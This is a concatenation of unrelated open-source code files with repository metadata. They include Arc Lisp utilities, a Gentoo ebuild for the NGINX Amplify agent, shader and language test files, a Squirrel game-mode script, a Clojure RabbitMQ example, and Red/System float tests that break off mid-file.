(elts (o init "") (o sep ", ")) (when elts (pr init (car elts)) (map [pr sep _] (cdr elts)) elts)) (def prs args (prall args "" " ")) (def tree-subst (old new tree) (if (is tree old) new (atom tree) tree (cons (tree-subst old new (car tree)) (tree-subst old new (cdr tree))))) (def ontree (f tree) (f tree) (unless (atom tree) (ontree f (car tree)) (ontree f (cdr tree)))) (def dotted (x) (if (atom x) nil (and (cdr x) (or (atom (cdr x)) (dotted (cdr x)))))) (def fill-table (table data) (each (k v) (pair data) (= (table k) v)) table) (def keys (h) (accum a (each (k v) h (a k)))) (def vals (h) (accum a (each (k v) h (a v)))) (def tablist (h) (accum a (maptable (fn args (a args)) h))) (def listtab (al) (let h (table) (map (fn ((k v)) (= (h k) v)) al) h)) (mac obj args `(listtab (list ,@(map (fn ((k v)) `(list ',k ,v)) (pair args))))) (def copy (x . args) (ret ans (case type.x sym x int x num x string x cons (cons (copy car.x) (copy cdr.x)) table (ret new (table) (each (k v) x (= new.k copy.v))) (err "Can't copy ( TODO copy constructor ) " x)) (map (fn ((k v)) (= ans.k v)) pair.args))) (def shr (n m) (shl n (- m))) (def abs (n) (if (< n 0) (- n) n)) ; The problem with returning a list instead of multiple values is that ; you can't act as if the fn didn't return multiple vals in cases where ; you only want the first. Not a big problem. (def round (n) (withs (base (trunc n) rem (abs (- n base))) (if (> rem 1/2) ((if (> n 0) + -) base 1) (< rem 1/2) base (odd base) ((if (> n 0) + -) base 1) base))) (def roundup (n) (withs (base (trunc n) rem (abs (- n base))) (if (>= rem 1/2) ((if (> n 0) + -) base 1) base))) (def nearest (n quantum) (* (roundup (/ n quantum)) quantum)) (def avg (ns) (/ (apply + ns) (len ns))) (def med (ns (o test >)) ((sort test ns) (round (/ (len ns) 2)))) ; Use mergesort on assumption that mostly sorting mostly sorted lists ; benchmark: (let td (n-of 10000 (rand 100)) (time (sort < td)) 1) (def sort (test seq) (if (alist seq) (mergesort test (copy seq)) (coerce (mergesort test (coerce seq 'cons)) (type seq)))) ; Destructive stable merge-sort, adapted from slib and improved ; by Eli Barzilay for MzLib; re-written in Arc. (def mergesort (less? lst) (with (n (len lst)) (if (<= n 1) lst ; ; check if the list is already sorted ; ; (which can be a common case, eg, directory lists). ; (let loop ([last (car lst)] [next (cdr lst)]) ; (or (null? next) ; (and (not (less? (car next) last)) ; (loop (car next) (cdr next))))) ; lst ((afn (n) (if (> n 2) ; needs to evaluate L->R (withs (j (/ (if (even n) n (- n 1)) 2) ; faster than round a (self j) b (self (- n j))) (merge less? a b)) ; the following case just inlines the length 2 case, ; it can be removed (and use the above case for n>1) ; and the code still works, except a little slower (is n 2) (with (x (car lst) y (cadr lst) p lst) (= lst (cddr lst)) (when (less? y x) (scar p y) (scar (cdr p) x)) (scdr (cdr p) nil) p) (is n 1) (with (p lst) (= lst (cdr lst)) (scdr p nil) p) nil)) n)))) ; Also by Eli. (def merge (less? x y) (if (no x) y (no y) x (let lup nil (assign lup (fn (r x y r-x?) ; r-x? for optimization -- is r connected to x? (if (less? (car y) (car x)) (do (if r-x? (scdr r y)) (if (cdr y) (lup y x (cdr y) nil) (scdr y x))) ; (car x) <= (car y) (do (if (no r-x?) (scdr r x)) (if (cdr x) (lup x (cdr x) y t) (scdr x y)))))) (if (less? (car y) (car x)) (do (if (cdr y) (lup y x (cdr y) nil) (scdr y x)) y) ; (car x) <= (car y) (do (if (cdr x) (lup x (cdr x) y t) (scdr x y)) x))))) (def bestn (n f seq) (firstn n (sort f seq))) (def split (seq pos) (list (cut seq 0 pos) (cut seq pos))) (mac time (expr) (w/uniq (t1 t2) `(let ,t1 (msec) (do1 ,expr (let ,t2 (msec) (prn "time: " (- ,t2 ,t1) " msec.")))))) (mac jtime (expr) `(do1 'ok (time ,expr))) (mac time10 (expr) `(time (repeat 10 ,expr))) (def number (n) (in (type n) 'int 'num)) (def since (t1) (- (seconds) t1)) (def minutes-since (t1) (/ (since t1) 60)) (def hours-since (t1) (/ (since t1) 3600)) (def days-since (t1) (/ (since t1) 86400)) ; could use a version for fns of 1 arg at least (def cache (timef valf) (with (cached nil gentime nil) (fn () (unless (and cached (< (since gentime) (timef))) (= cached (valf) gentime (seconds))) cached))) (mac defcache (name lasts . body) `(safeset ,name (cache (fn () ,lasts) (fn () ,@body)))) (mac errsafe (expr) `(on-err (fn (c) nil) (fn () ,expr))) (def saferead (arg) (errsafe:read arg)) (def safe-load-table (filename) (or (errsafe:load-table filename) (table))) ;(def ensure-dir (path) ; (unless (dir-exists path) ; (system (string "mkdir -p " path)))) (def date ((o s (seconds))) (rev (nthcdr 3 (timedate s)))) (def datestring ((o s (seconds))) (let (y m d) (date s) (string y "-" (if (< m 10) "0") m "-" (if (< d 10) "0") d))) (def count (test x) (with (n 0 testf (testify test)) (each elt x (if (testf elt) (++ n))) n)) (def ellipsize (str (o limit 80)) (if (<= (len str) limit) str (+ (cut str 0 limit) "..."))) (def rand-elt (seq) (seq (rand (len seq)))) (mac until (test . body) `(while (no ,test) ,@body)) (def before (x y seq (o i 0)) (with (xp (pos x seq i) yp (pos y seq i)) (and xp (or (no yp) (< xp yp))))) (def orf fns (fn args ((afn (fs) (and fs (or (apply (car fs) args) (self (cdr fs))))) fns))) (def andf fns (fn args ((afn (fs) (if (no fs) t (no (cdr fs)) (apply (car fs) args) (and (apply (car fs) args) (self (cdr fs))))) fns))) (def atend (i s) (> i (- (len s) 2))) (def multiple (x y) (is 0 (mod x y))) (mac nor args `(no (or ,@args))) (mac nand args `(no (and ,@args))) ; Consider making the default sort fn take compare's two args (when do ; you ever have to sort mere lists of numbers?) and rename current sort ; as prim-sort or something. ; Could simply modify e.g. > so that (> len) returned the same thing ; as (compare > len). (def compare (comparer scorer) (fn (x y) (comparer (scorer x) (scorer y)))) ; Cleaner thus, but may only ever need in 2 arg case. ;(def compare (comparer scorer) ; (fn args (apply comparer map scorer args))) ; (def only (f g . args) (aif (apply g args) (f it))) (def only (f) (fn args (if (car args) (apply f args)))) (mac conswhen (f x y) (w/uniq (gf gx) `(with (,gf ,f ,gx ,x) (if (,gf ,gx) (cons ,gx ,y) ,y)))) ; Could combine with firstn if put f arg last, default to (fn (x) t). (def retrieve (n f xs) (if (no n) (keep f xs) (or (<= n 0) (no xs)) nil (f (car xs)) (cons (car xs) (retrieve (- n 1) f (cdr xs))) (retrieve n f (cdr xs)))) (def single (x) (and (acons x) (no (cdr x)))) (def intersperse (x ys) (and ys (cons (car ys) (mappend [list x _] (cdr ys))))) (def counts (seq) (ret ans (table) (each x seq (++ (ans x 0))))) (def tree-counts (tree) (counts flat.tree)) (def commonest (seq) (best (compare > counts.seq) seq)) (def sort-by-commonest (seq (o f idfn)) (let h (counts:map f seq) (sort (compare > h:f) seq))) (def reduce (f xs) (if (cddr xs) (reduce f (cons (f (car xs) (cadr xs)) (cddr xs))) (apply f xs))) (def rreduce (f xs) (if (cddr xs) (f (car xs) (rreduce f (cdr xs))) (apply f xs))) (def positive (x) (and (number x) (> x 0))) (mac w/table (var . body) `(let ,var (table) ,@body ,var)) (def median (ns) ((sort > ns) (trunc (/ (len ns) 2)))) (mac noisy-each (n var val . body) (w/uniq (gn gc) `(with (,gn ,n ,gc 0) (each ,var ,val (when (multiple (++ ,gc) ,gn) (pr ".") (flushout) ) ,@body) (prn) (flushout)))) (mac point (name . body) (w/uniq (g p) `(ccc (fn (,g) (let ,name (fn ((o ,p)) (,g ,p)) ,@body))))) (mac catch body `(point throw ,@body)) (def downcase (x) (let downc (fn (c) (let n (coerce c 'int) (if (or (< 64 n 91) (< 191 n 215) (< 215 n 223)) (coerce (+ n 32) 'char) c))) (case (type x) string (map downc x) char (downc x) sym (if x (sym (map downc (coerce x 'string)))) (err "Can't downcase" x)))) (def upcase (x) (let upc (fn (c) (let n (coerce c 'int) (if (or (< 96 n 123) (< 223 n 247) (< 247 n 255)) (coerce (- n 32) 'char) c))) (case (type x) string (map upc x) char (upc x) ; it's arguable whether (upcase nil) should be nil or NIL, but pg has ; chosen NIL, so in the name of compatibility: sym (if x (sym (map upc (coerce x 'string))) 'NIL) (err "Can't upcase" x)))) (def inc (x (o n 1)) (coerce (+ (coerce x 'int) n) (type x))) (def range (start end) (if (> start end) nil (cons start (range (inc start) end)))) (def mismatch (s1 s2) (catch (on c s1 (when (isnt c (s2 index)) (throw index))))) (def memtable (ks) (let h (table) (each k ks (set (h k))) h)) (= bar* " | ") (mac w/bars body (w/uniq (out needbars) `(let ,needbars nil (do ,@(map (fn (e) `(let ,out (tostring ,e) (unless (is ,out "") (if ,needbars (pr bar* ,out) (do (set ,needbars) (pr ,out)))))) body))))) (def len< (x n) (< (len x) n)) (def len> (x n) (> (len x) n)) (mac trav (x . fs) (w/uniq g `((afn (,g) (when ,g ,@(map [list _ g] fs))) ,x))) (mac or= (place expr) (let (binds val setter) (setforms place) `(withs ,binds ; atwiths (or ,val (,setter ,expr))))) (= vtables* (table)) (mac defgeneric (name args . body) `(do (or= (vtables* ',name) (table)) (def ,name allargs (aif (aand (vtables* ',name) (it (type car.allargs))) (apply it allargs) (aif (pickles* (type car.allargs)) (apply ,name (map it allargs)) (let ,args allargs ,@body)))))) (mac defmethod (name args type . body) `(= ((vtables* ',name) ',type) (fn ,args ,@body))) (= pickles* (table)) (mac pickle(type f) `(= (pickles* ',type) ,f)) (mac evtil (expr test) (w/uniq gv `(let ,gv ,expr (while (no (,test ,gv)) (= ,gv ,expr)) ,gv))) (def rand-key (h) (if (empty h) nil (let n (rand (len h)) (catch (each (k v) h (when (is (-- n) -1) (throw k))))))) (def ratio (test xs) (if (empty xs) 0 (/ (count test xs) (len xs)))) (def butlast (x) (cut x 0 (- (len x) 1))) (mac between (var expr within . body) (w/uniq first `(let ,first t (each ,var ,expr (if ,first (wipe ,first) ,within) ,@body)))) (def cars (xs) (map car xs)) (def cdrs (xs) (map cdr xs)) (mac mapeach (var lst . body) `(map (fn (,var) ,@body) ,lst)) (def gcd (a b) (if (is a b) a (> a b) (gcd (- a b) b) (> b a) (gcd a (- b a)))) (defss cxr-ss #/^c([ad]{5,})r$/ (xs) (let ac [case _ #\a 'car #\d 'cdr] `(let f (fn (x) ,((afn (xs) (if xs `(,(ac car.xs) ,(self cdr.xs)) 'x)) (coerce (string xs) 'cons))) (fn-name f ',(coerce (+ 'c xs 'r) 'sym)) f)))
Arc
5
smihica/arc-js
src/arc/arc.arc
[ "Artistic-2.0" ]
# Copyright (C) Nginx, Inc. # Distributed under the terms of the BSD 2-clause Simplified License # $Id$ EAPI="5" PYTHON_COMPAT=( python2_7 ) inherit eutils distutils-r1 user versionator DESCRIPTION="NGINX Amplify Agent" HOMEPAGE="https://amplify.nginx.com" MY_PV=$(replace_version_separator 2 '-') MY_PV1=$(get_version_component_range 1-2) FNAME="${PN}-${MY_PV}" SRC_URI="https://github.com/nginxinc/nginx-amplify-agent/archive/v${PV}-1.zip" RESTRICT="mirror" LICENSE="BSD 2-clause Simplified License" SLOT="0" KEYWORDS="amd64 x86" IUSE="" DEPEND=" ~dev-python/gevent-1.2.1[${PYTHON_USEDEP}] ~dev-python/lockfile-0.11.0[${PYTHON_USEDEP}] ~dev-python/netaddr-0.7.18[${PYTHON_USEDEP}] ~dev-python/netifaces-0.10.4[${PYTHON_USEDEP}] >=dev-python/psutil-4.0.0[${PYTHON_USEDEP}] ~dev-python/requests-2.12.5[${PYTHON_USEDEP}] ~dev-python/ujson-1.33[${PYTHON_USEDEP}] >=dev-python/python-daemon-2.0.6[${PYTHON_USEDEP}] ~dev-python/pyparsing-2.2.0[${PYTHON_USEDEP}] ~dev-python/setproctitle-1.1.10[${PYTHON_USEDEP}] >=dev-python/rstr-2.2.3[${PYTHON_USEDEP}] ~dev-python/flup-1.0.2[${PYTHON_USEDEP}] ~dev-python/scandir-1.5[${PYTHON_USEDEP}] >=dev-python/crossplane-0.1.1[${PYTHON_USEDEP}] " RDEPEND=" www-servers/nginx[nginx_modules_http_stub_status] " S="${WORKDIR}/${FNAME}" python_install_all() { distutils-r1_python_install_all newinitd "${FILESDIR}"/nginx-amplify-agent.initd nginx-amplify-agent keepdir /var/log/amplify-agent/ /var/run/amplify-agent } pkg_postinst() { chown nginx /var/log/amplify-agent # agent rewrites file itself, needs to be writable chown nginx /etc/amplify-agent/agent.conf chown nginx /var/run/amplify-agent }
Gentoo Ebuild
4
dp92987/nginx-amplify-agent
packages/nginx-amplify-agent/gentoo/nginx-amplify-overlay/app-admin/nginx-amplify-agent/nginx-amplify-agent-0.47.ebuild
[ "BSD-2-Clause" ]
declare namespace t = "http://schemas.microsoft.com/exchange/services/2006/types"; declare namespace m = "http://schemas.microsoft.com/exchange/services/2006/messages"; declare namespace soap = "http://schemas.xmlsoap.org/soap/envelope/"; if (/soap:Envelope/soap:Body/m:Subscribe/m:StreamingSubscriptionRequest and count(//m:StreamingSubscriptionRequest/t:FolderIds/t:FolderId) = 4 and //m:StreamingSubscriptionRequest/t:FolderIds/t:FolderId[@Id="aW5ib3g="] and //m:StreamingSubscriptionRequest/t:FolderIds/t:FolderId[@Id="Y2FsZW5kYXI="] and //m:StreamingSubscriptionRequest/t:FolderIds/t:FolderId[@Id="dGFza3M="] and //m:StreamingSubscriptionRequest/t:FolderIds/t:FolderId[@Id="Y29udGFjdHM="] and count(//m:StreamingSubscriptionRequest/t:EventTypes/t:EventType) = 6 ) then ( <soap:Envelope><soap:Header> <t:ServerVersionInfo MajorVersion="15" MinorVersion="01" MajorBuildNumber="225" MinorBuildNumber="042" /> </soap:Header><soap:Body> <m:SubscribeResponse>" <m:ResponseMessages>" <m:SubscribeResponseMessage ResponseClass="Success"> <m:ResponseCode>NoError</m:ResponseCode> <m:SubscriptionId>otPO1iOPzS+vL5HOuTZY+cCfIIn+vRqOO0ZHTEWAa8k=</m:SubscriptionId> </m:SubscribeResponseMessage> </m:ResponseMessages> </m:SubscribeResponse></soap:Body></soap:Envelope> ) else ()
XQuery
3
KrissN/akonadi-ews
test/resources/subscribe-streaming.xq
[ "RSA-MD" ]
(module (func $add (export "add") (param $p0 i32) (param $p1 i32) (result i32) (i32.add (get_local $p0) (get_local $p1) ) ) )
WebAssembly
4
1shenxi/webpack
test/configCases/split-chunks/issue-11513/wasm.wat
[ "MIT" ]
untyped global function GamemodeLts_Init struct { entity lastDamageInfoVictim entity lastDamageInfoAttacker int lastDamageInfoMethodOfDeath float lastDamageInfoTime bool shouldDoHighlights } file void function GamemodeLts_Init() { // gamemode settings SetShouldUsePickLoadoutScreen( true ) SetSwitchSidesBased( true ) SetRoundBased( true ) SetRespawnsEnabled( false ) Riff_ForceSetEliminationMode( eEliminationMode.PilotsTitans ) Riff_ForceSetSpawnAsTitan( eSpawnAsTitan.Always ) SetShouldUseRoundWinningKillReplay( true ) SetRoundWinningKillReplayKillClasses( true, true ) // both titan and pilot kills are tracked ScoreEvent_SetupEarnMeterValuesForTitanModes() SetLoadoutGracePeriodEnabled( false ) FlagSet( "ForceStartSpawn" ) AddCallback_OnPilotBecomesTitan( RefreshThirtySecondWallhackHighlight ) AddCallback_OnTitanBecomesPilot( RefreshThirtySecondWallhackHighlight ) SetTimeoutWinnerDecisionFunc( CheckTitanHealthForDraw ) TrackTitanDamageInPlayerGameStat( PGS_ASSAULT_SCORE ) ClassicMP_SetCustomIntro( ClassicMP_DefaultNoIntro_Setup, ClassicMP_DefaultNoIntro_GetLength() ) ClassicMP_ForceDisableEpilogue( true ) AddCallback_GameStateEnter( eGameState.Playing, WaitForThirtySecondsLeft ) } void function WaitForThirtySecondsLeft() { thread WaitForThirtySecondsLeftThreaded() } void function WaitForThirtySecondsLeftThreaded() { svGlobal.levelEnt.EndSignal( "RoundEnd" ) // end this on round end float endTime = expect float ( GetServerVar( "roundEndTime" ) ) // wait until 30sec left wait ( endTime - 30 ) - Time() PlayMusicToAll( eMusicPieceID.LEVEL_LAST_MINUTE ) foreach ( entity player in GetPlayerArray() ) { // warn there's 30 seconds left Remote_CallFunction_NonReplay( player, "ServerCallback_LTSThirtySecondWarning" ) // do initial highlight RefreshThirtySecondWallhackHighlight( player, null ) } } void function RefreshThirtySecondWallhackHighlight( entity player, entity titan ) { if ( TimeSpentInCurrentState() < expect float ( GetServerVar( "roundEndTime" ) ) - 30.0 ) return Highlight_SetEnemyHighlight( player, "enemy_sonar" ) // i think this needs a different effect, this works for now tho if ( player.GetPetTitan() != null ) Highlight_SetEnemyHighlight( player.GetPetTitan(), "enemy_sonar" ) } int function CheckTitanHealthForDraw() { int militiaTitans int imcTitans float militiaHealth float imcHealth foreach ( entity titan in GetTitanArray() ) { if ( titan.GetTeam() == TEAM_MILITIA ) { // doomed is counted as 0 health militiaHealth += titan.GetTitanSoul().IsDoomed() ? 0.0 : GetHealthFrac( titan ) militiaTitans++ } else { // doomed is counted as 0 health in this imcHealth += titan.GetTitanSoul().IsDoomed() ? 0.0 : GetHealthFrac( titan ) imcTitans++ } } // note: due to how stuff is set up rn, there's actually no way to do win/loss reasons outside of a SetWinner call, i.e. not in timeout winner decision // as soon as there is, strings in question are "#GAMEMODE_TITAN_TITAN_ADVANTAGE" and "#GAMEMODE_TITAN_TITAN_DISADVANTAGE" if ( militiaTitans != imcTitans ) return militiaTitans > imcTitans ? TEAM_MILITIA : TEAM_IMC else if ( militiaHealth != imcHealth ) return militiaHealth > imcHealth ? TEAM_MILITIA : TEAM_IMC return TEAM_UNASSIGNED }
Squirrel
4
GeckoEidechse/NorthstarMods
Northstar.CustomServers/mod/scripts/vscripts/gamemodes/_gamemode_lts.nut
[ "MIT" ]
[CustomMessages] iis_title=Internet Information Services (IIS) [Code] function iis(): boolean; begin if (not RegKeyExists(HKLM, 'SYSTEM\CurrentControlSet\Services\W3SVC\Security')) then MsgBox(FmtMessage(CustomMessage('depinstall_missing'), [CustomMessage('iis_title')]), mbError, MB_OK) else Result := true; end;
Inno Setup
3
internetsimple/Bulk-Crap-Uninstaller
installer/scripts/products/iis.iss
[ "Apache-2.0" ]
/* * Copyright 2010-2018 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license * that can be found in the LICENSE file. */ fun bar(vararg x: Int) { x.forEach { println(it) } println("size: ${x.size}") } inline fun foo() = bar(17, 19, 23, *intArrayOf(29, 31))
Kotlin
4
benasher44/kotlin-native
backend.native/tests/serialization/vararg.kt
[ "ECL-2.0", "Apache-2.0" ]
Red/System [ Title: "Windows calendar widget" Author: "Vladimir Vasilyev" File: %calendar.reds Tabs: 4 Rights: "Copyright (C) 2019-2020 Red Foundation. All rights reserved." License: { Distributed under the Boost Software License, Version 1.0. See https://github.com/red/red/blob/master/BSL-License.txt } ] with [platform][ change-calendar: func [ handle [handle!] date [red-date!] /local time [tagSYSTEMTIME] ][ time: declare tagSYSTEMTIME time/year-month: get-year-month date time/week-day: get-day date SendMessage handle MCM_SETCURSEL 0 as integer! time ] sync-calendar: func [ handle [handle!] /local slot [red-value!] time [tagSYSTEMTIME] year [integer!] month [integer!] day [integer!] ][ time: declare tagSYSTEMTIME SendMessage handle MCM_GETCURSEL 0 as integer! time year: cap WIN32_LOWORD(time/year-month) month: WIN32_HIWORD(time/year-month) day: WIN32_HIWORD(time/week-day) unless null? current-msg [ current-msg/hWnd: handle slot: get-facet current-msg FACE_OBJ_DATA date/make-at slot year month day 0.0 0 0 no no ] ] init-calendar: func [ handle [handle!] data [red-value!] ][ either TYPE_OF(data) = TYPE_DATE [ change-calendar handle as red-date! data ][ sync-calendar handle ] ] update-calendar-color: func [ handle [handle!] color [red-value!] /local colorref [integer!] painted? [logic!] ][ painted?: yes switch TYPE_OF(color) [ TYPE_TUPLE [colorref: color/data1] TYPE_NONE [colorref: GetSysColor COLOR_3DFACE] ;-- same as panel default [painted?: no] ] if painted? [SendMessage handle MCM_SETCOLOR 0 colorref] ;-- MCSC_BACKGROUND ] process-calendar-change: func [handle [handle!]][ sync-calendar handle make-event current-msg 0 EVT_CHANGE ] get-year-month: func [date [red-date!] return: [integer!]][ return DATE_GET_MONTH(date/date) << 16 or cap DATE_GET_YEAR(date/date) ] get-day: func [date [red-date!] return: [integer!]][ return DATE_GET_DAY(date/date) << 16 and FFFF0000h ] cap: func [year [integer!] return: [integer!]][ if year < 1601 [year: 1601] if year > 9999 [year: 9999] return year ] ]
Red
4
GalenIvanov/red
modules/view/backends/windows/calendar.reds
[ "BSL-1.0", "BSD-3-Clause" ]
{ "plugins": ["proposal-pipeline-operator"], "throws": "The pipeline plugin requires a \"proposal\" option. \"proposal\" must be one of: \"minimal\", \"fsharp\", \"hack\", \"smart\". See <https://babeljs.io/docs/en/babel-plugin-proposal-pipeline-operator>." }
JSON
1
fatash89/babel
packages/babel-plugin-proposal-pipeline-operator/test/fixtures/no-proposal/options.json
[ "MIT" ]
## @package get_python_cmake_flags # Module scripts.get_python_cmake_flags ############################################################################## # Use this script to find your preferred python installation. ############################################################################## # # You can use the following to build with your preferred version of python # if your installation is not being properly detected by CMake. # # mkdir -p build && cd build # cmake $(python ../scripts/get_python_cmake_flags.py) .. # make # import sysconfig import sys flags = [ '-DPYTHON_EXECUTABLE:FILEPATH={}'.format(sys.executable), '-DPYTHON_INCLUDE_DIR={}'.format(sysconfig.get_path('include')), ] print(' '.join(flags), end='')
Python
4
Hacky-DH/pytorch
scripts/get_python_cmake_flags.py
[ "Intel" ]
SmalltalkCISpec { #loading : [ SCIMetacelloLoadSpec { #baseline : 'Sandblocks', #platforms : [ #squeak ], #directory: 'packages', #useLatestMetacello : true } ], #testing : { #coverage : { #packages : [ 'Sandblocks' ], #format : #coveralls } } }
STON
4
LinqLover/sandblocks
.smalltalk.ston
[ "MIT" ]
#include <metal_stdlib> #include <simd/simd.h> using namespace metal; struct Uniforms { half4 testInputs; half4 colorGreen; half4 colorRed; half4 colorWhite; }; struct Inputs { }; struct Outputs { half4 sk_FragColor [[color(0)]]; }; fragment Outputs fragmentMain(Inputs _in [[stage_in]], constant Uniforms& _uniforms [[buffer(0)]], bool _frontFacing [[front_facing]], float4 _fragCoord [[position]]) { Outputs _out; (void)_out; half _skTemp0; half _skTemp1; half2 _skTemp2; half _skTemp3; half3 _skTemp4; half _skTemp5; half4 _skTemp6; half _skTemp7; half _skTemp8; half _skTemp9; half2 _skTemp10; half2 _skTemp11; half3 _skTemp12; half3 _skTemp13; half4 _skTemp14; half4 _skTemp15; half4 expectedA = half4(0.75h, 0.0h, 0.75h, 0.25h); half4 expectedB = half4(0.25h, 0.0h, 0.75h, 1.0h); _out.sk_FragColor = (((((((((((((((_skTemp0 = _uniforms.testInputs.x, _skTemp1 = 1.0h, _skTemp0 - _skTemp1 * floor(_skTemp0 / _skTemp1)) == expectedA.x && all((_skTemp2 = _uniforms.testInputs.xy, _skTemp3 = 1.0h, _skTemp2 - _skTemp3 * floor(_skTemp2 / _skTemp3)) == expectedA.xy)) && all((_skTemp4 = _uniforms.testInputs.xyz, _skTemp5 = 1.0h, _skTemp4 - _skTemp5 * floor(_skTemp4 / _skTemp5)) == expectedA.xyz)) && all((_skTemp6 = _uniforms.testInputs, _skTemp7 = 1.0h, _skTemp6 - _skTemp7 * floor(_skTemp6 / _skTemp7)) == expectedA)) && 0.75h == expectedA.x) && all(half2(0.75h, 0.0h) == expectedA.xy)) && all(half3(0.75h, 0.0h, 0.75h) == expectedA.xyz)) && all(half4(0.75h, 0.0h, 0.75h, 0.25h) == expectedA)) && (_skTemp8 = _uniforms.testInputs.x, _skTemp9 = _uniforms.colorWhite.x, _skTemp8 - _skTemp9 * floor(_skTemp8 / _skTemp9)) == expectedA.x) && all((_skTemp10 = _uniforms.testInputs.xy, _skTemp11 = _uniforms.colorWhite.xy, _skTemp10 - _skTemp11 * floor(_skTemp10 / _skTemp11)) == expectedA.xy)) && all((_skTemp12 = _uniforms.testInputs.xyz, _skTemp13 = _uniforms.colorWhite.xyz, _skTemp12 - _skTemp13 * floor(_skTemp12 / _skTemp13)) == expectedA.xyz)) && all((_skTemp14 = _uniforms.testInputs, _skTemp15 = _uniforms.colorWhite, _skTemp14 - _skTemp15 * floor(_skTemp14 / _skTemp15)) == expectedA)) && 0.25h == expectedB.x) && all(half2(0.25h, 0.0h) == expectedB.xy)) && all(half3(0.25h, 0.0h, 0.75h) == expectedB.xyz)) && all(half4(0.25h, 0.0h, 0.75h, 1.0h) == expectedB) ? _uniforms.colorGreen : _uniforms.colorRed; return _out; }
Metal
3
fourgrad/skia
tests/sksl/intrinsics/Mod.metal
[ "BSD-3-Clause" ]
(ns rabbitmq.tutorials.emit-log (:require [langohr.core :as lc] [langohr.channel :as lch] [langohr.exchange :as le] [langohr.basic :as lb] [clojure.string :as s])) (def ^{:const true} x "logs") (defn -main [& args] (with-open [conn (lc/connect)] (let [ch (lch/open conn) payload (if (empty? args) "Hello, world!" (s/join " " args))] (le/fanout ch x {:durable false :auto-delete false}) (lb/publish ch x "" payload) (println (format " [x] Sent %s" payload)))))
Clojure
3
Diffblue-benchmarks/Rabbitmq-rabbitmq-tutorials
clojure/src/rabbitmq/tutorials/emit_log.clj
[ "Apache-2.0" ]
#tag FileTypeSet #tag FileType CodeName=SecurityCertificate Extension=.crt;.pem;.key;.x509 Flags=&h0 MacCreator= MacType= Name=Security Certificate #tag EndFileType #tag FileType CodeName=NetscapeCookieJar Extension=.jar;.cookies;.txt Flags=&h0 MacCreator= MacType= Name=Netscape Cookie Jar #tag EndFileType #tag EndFileTypeSet
REALbasic
4
charonn0/RB-libcURL
cURLTypes.rbbas
[ "MIT" ]
'reach 0.1'; // Importing an ident that isn't there import {whoops} from './sample_lib.rsh' export const main = Reach.App( {}, [], () => { return 0; } );
RenderScript
3
chikeabuah/reach-lang
hs/t/n/Err_Import_Missing.rsh
[ "Apache-2.0" ]
#include <upc_relaxed.h> #include <stdio.h> #define K 2 extern void cilk_test (int n); typedef struct sq_mat { double blk[K][K]; } matblock_t; shared matblock_t A[THREADS]; int main() { int i,j; for (i = 0; i<K; i++) { for (j = 0; j<K; j++) A[MYTHREAD].blk[i][j] = i*K+j; } upc_barrier; upc_forall(i=0; i < THREADS; i++; &A[i]) { cilk_test(10); } return 0; }
Unified Parallel C
3
fredmorcos/attic
Projects/Matrix FFT UPC Cilk/archive/tests/upc-cilk-primary-old/upc-cilk-test/test.upc
[ "Unlicense" ]
Red/System [ Title: "Red/System integer! datatype tests" Author: "Peter W A Wood, Nenad Rakocevic" File: %float-test.reds Version: 0.1.0 Tabs: 4 Rights: "Copyright (C) 2012-2015 Peter W A Wood,-2018 Red Foundation. All rights reserved." License: "BSD-3 - https://github.com/red/red/blob/origin/BSD-3-License.txt" ] #include %../../../../quick-test/quick-test.reds ~~~start-file~~~ "float" ===start-group=== "float assignment" --test-- "float-1" f: 100.0 --assert f = 100.0 --test-- "float-2" f: 1.222090944E+33 --assert f = 1.222090944E+33 --test-- "float-3" f: 9.99999E-45 --assert f = 9.99999E-45 --test-- "float-4" f: 1.0 f1: f --assert f1 = 1.0 ===end-group=== ===start-group=== "float argument to external function" --test-- "float-ext-1" --assert -1.0 = cos pi --test-- "float-ext-2" --assertf~= 0.0 sin pi 1E-12 --test-- "float-ext-3" --assert -1.0 = cos 3.14159265358979 ===end-group=== ===start-group=== "float function arguments" ff: func [ fff [float!] ffg [float!] return: [integer!] /local ffl [float!] ][ ffl: fff if ffl <> fff [return 1] ffl: ffg if ffl <> ffg [return 2] 1 ] --test-- "float-func-args-1" --assert 1 = ff 1.0 2.0 --test-- "float-func-args-2" --assert 1 = ff 1.222090944E+33 9.99999E-45 ===end-group=== ===start-group=== "float locals" local-float: func [n [float!] return: [float!] /local p][p: n p] --test-- "float-loc-1" pi: local-float 3.14159265358979 --assert pi = 3.14159265358979 --assert -1.0 = cos pi --assert -1.0 = local-float cos pi --test-- "float-loc-2" f: local-float pi --assert pi = local-float f --test-- "float-loc-3" local-float2: func [ n [float!] return: [float!] /local p ][ p: n local-float p ] pi: local-float2 3.14159265358979 --assert -1.0 = local-float2 cos pi f: local-float2 pi --assert pi = local-float2 f --test-- "float-loc-4" local-float3: func [ n [float!] return: [float!] /local p [float!] ][ p: n local-float p ] pi: local-float3 3.14159265358979 --assert -1.0 = local-float3 cos pi f: local-float3 pi --assert pi = local-float3 f --test-- "float-loc-5" local-float4: func [n [float!] return: [float!] /local r p][p: n p] --assert -1.0 = local-float4 cos pi f: local-float4 pi --assert pi = local-float4 f --test-- "float-loc-6" local-float5: func [n [float!] return: [float!] /local r p][p: n local-float p] --assert -1.0 = local-float5 cos pi f: local-float5 pi --assert pi = local-float5 f ===end-group=== ===start-group=== "float function return" ff1: func [ ff1i [integer!] return: [float!] ][ switch ff1i [ 1 [1.0] 2 [1.222090944E+33] 3 [9.99999E-45] ] ] --test-- "float return 1" --assert 1.0 = ff1 1 --test-- "float return 2" --assert 1.222090944E+33 = ff1 2 --test-- "float return 3" --assert 9.99999E-45 = ff1 3 ===end-group=== ===start-group=== "float members in struct" --test-- "float-struct-1" sf1: declare struct! [ a [float!] ] --assert 0.0 = sf1/a --test-- "float-struct-2" sf2: declare struct! [ a [float!] ] sf1/a: 1.222090944E+33 --assert 1.222090944E+33 = sf1/a --test-- "float-struct-3" sf3: declare struct! [ a [float!] b [float!] ] sf3/a: 1.222090944E+33 sf3/b: 9.99999E-45 --assert 1.222090944E+33 = sf3/a --assert 9.99999E-45 = sf3/b --test-- "float-struct-4" sf4: declare struct! [ c [byte!] a [float!] l [logic!] b [float!] ] sf4/a: 1.222090944E+33 sf4/b: 9.99999E-45 --assert 1.222090944E+33 = sf4/a --assert 9.99999E-45 = sf4/b --test-- "float-struct-5" sf5: declare struct! [f [float!] i [integer!]] sf5/i: 1234567890 sf5/f: 3.14159265358979 --assert sf5/i = 1234567890 --assert sf5/f = pi --test-- "float-struct-6" sf6: declare struct! [i [integer!] f 